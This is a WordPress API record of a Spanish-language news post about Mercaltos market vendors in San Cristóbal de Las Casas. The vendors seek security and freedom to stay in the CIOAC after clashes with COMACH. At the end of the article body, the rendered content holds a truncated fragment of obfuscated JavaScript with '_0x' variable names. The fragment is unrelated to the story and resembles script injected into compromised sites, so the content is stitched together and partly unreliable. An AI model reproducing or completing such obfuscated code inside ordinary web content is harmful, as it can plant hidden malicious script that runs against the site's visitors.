{"id":8894,"date":"2023-03-03T03:22:05","date_gmt":"2023-03-03T03:22:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8894"},"modified":"2023-03-03T03:22:05","modified_gmt":"2023-03-03T03:22:05","slug":"piden-locatarios-de-mercaltos-respetar-libertad-al-pertenecer-a-organizaciones-sociales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8894","title":{"rendered":"Piden locatarios de Mercaltos respetar libertad al pertenecer a organizaciones sociales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-02-at-2.24.40-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-8895\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-02-at-2.24.40-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-02-at-2.24.40-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-02-at-2.24.40-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-02-at-2.24.40-PM.jpeg 1152w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal02 de marzo del 2023. San Crist\u00f3bal de Las Casas.- Locatarios del Mercado de los Altos (Mercaltos) pidieron a las autoridades y a la l\u00edderes de la Coordinadora de Organizaciones por el Medio Ambiente para un Chiapas Mejor (Comach) respetar la decisi\u00f3n de pertenecer a cualquier organizaci\u00f3n como lo es la Central Independiente de Obreros Agr\u00edcolas y Campesinos (CIOAC).Y es que alrededor de 60 locatarios  pidieron la intervenci\u00f3n de las autoridades para que les brinden seguridad, ya que la tarde-noche del pasado mi\u00e9rcoles, tras una reuni\u00f3n en dicha central de abasto, les fueron retirados calcoman\u00edas con las siglas de la organizaci\u00f3n a la que pertenecen desde hace varios a\u00f1os como lo es la CIOAC, queri\u00e9ndolos obligar a ser parte de la COMACH.Darinel Arizmendi, uno de los locatarios, dijo que ellos llevan muchos a\u00f1os trabajando en esa central de abastos y no hab\u00edan tenido ning\u00fan detalle con eso, sin embargo, a ra\u00edz de los problemas entre la COMACH y los due\u00f1os del Mercado, han querido que todos se unan a esa organizaci\u00f3n.&#8221;Somos un grupo de comerciantes que no queremos problemas con los de esa organizaci\u00f3n, no queremos problemas con el due\u00f1o de la empresa Mercaltos queremos trabajar en paz y tranquilos y pues estamos viendo que est\u00e1n provocando un conflicto&#8221;.Agreg\u00f3, &#8220;ellos quisieran que todo el pasillo de Mercaltos perteneciera a su organizaci\u00f3n no s\u00e9 con qu\u00e9 intenciones, tal vez con la intenci\u00f3n de demostrar que tienen todo el mercado en su dominio pero no es as\u00ed, desde los ba\u00f1os hacia afuera todos los comerciantes no estamos ni a favor ni en contra ni de Mart\u00edn ni de los empresarios de Mercaltos&#8221;.Dej\u00f3 ver que tres personas, dos mujeres, entre ellas una menor de edad, resultaron agredidas tras un zafarrancho la tarde del mi\u00e9rcoles, quienes despu\u00e9s del incidente acudieron a realizar sus denuncias correspondientes.Por \u00faltimo indic\u00f3 que ellos han venido trabajando en paz, pagando el derecho de piso y las rentas, &#8220;queremos seguir trabajando as\u00ed, no queremos involucrarnos en el problema de esta organizaci\u00f3n ni en el problema de los empresarios, somos alrededor de 70 a 80 comerciantes los afectados, pedimos seguridad porque tenemos temor a que regresen a agredirnos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal02 de marzo del 2023. San Crist\u00f3bal de Las Casas.- Locatarios del Mercado de los Altos (Mercaltos) pidieron a las autoridades y a la l\u00edderes de la Coordinadora de Organizaciones por el Medio Ambiente para un Chiapas Mejor (Comach) respetar la decisi\u00f3n de pertenecer a cualquier organizaci\u00f3n como lo es la Central Independiente de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8895,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8894","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8894","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8894"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8894\/revisions"}],"predecessor-version":[{"id":8896,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8894\/revisions\/8896"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8895"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8894"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8894"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8894"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}